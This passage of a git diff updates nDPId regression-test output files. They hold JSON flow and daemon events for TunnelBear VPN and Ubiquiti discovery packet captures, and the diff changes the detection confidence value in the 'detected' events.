+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1655734524312,"flow_last_seen":1655734524991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":8613,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50178,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1655734776460,"flow_last_seen":1655734777910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2900,"flow_tot_l4_payload_len":10971,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734776516,"flow_last_seen":1655734776970,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734776520,"flow_last_seen":1655734776969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1655734776527,"flow_last_seen":1655734776901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":894,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734776538,"flow_last_seen":1655734776971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734777904,"flow_last_seen":1655734777912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","packets-captured":421,"packets-processed":421,"total-skipped-flows":0,"total-l4-payload-len":92077,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":20,"total-detection-updates":19,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":148,"global_ts_msec":1655734778245} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 421/421 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 92077 bytes +~~ total detected protocols..: 20 +~~ total active/idle flows...: 21/21 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6120691 bytes +~~ total memory freed........: 6120691 bytes +~~ total allocations/frees...: 121465/121465 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 458 chars +~~ json string max len.......: 1259 chars +~~ json string avg len.......: 858 chars diff --git a/test/results/ubntac2.pcap.out b/test/results/ubntac2.pcap.out index ef73410dd..a86f877e1 100644 --- a/test/results/ubntac2.pcap.out +++ b/test/results/ubntac2.pcap.out @@ -2,36 +2,36 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1486943433175} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1486943433175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943433175,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4FAAEARuPfAqAEB\/\/\/\/\/4UlJxEAtx2vAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeYAsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFc8bAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943433175,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1486943443357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943443357,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4JAAEARuPbAqAEB\/\/\/\/\/65hJxEAt\/NoAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeagsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdAbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943443357,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1486943453510,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943453510,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4NAAEARuPXAqAEB\/\/\/\/\/9gZJxEAt8imAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADedAsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdEbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943453510,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1486943463665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943463665,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4RAAEARuPTAqAEB\/\/\/\/\/7r\/JxEAt+S2AgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADefgsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdIbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943463665,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1486943473817,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943473817,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4VAAEARuPPAqAEB\/\/\/\/\/+l8JxEAt7UuAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeiQsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdMbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1486943483995,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943483995,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4ZAAEARuPLAqAEB\/\/\/\/\/8v8JxEAt9GkAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADekwsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdQbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1486943494148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943494148,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4dAAEARuPHAqAEB\/\/\/\/\/7qCJxEAt+IUAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADenQsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdUbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 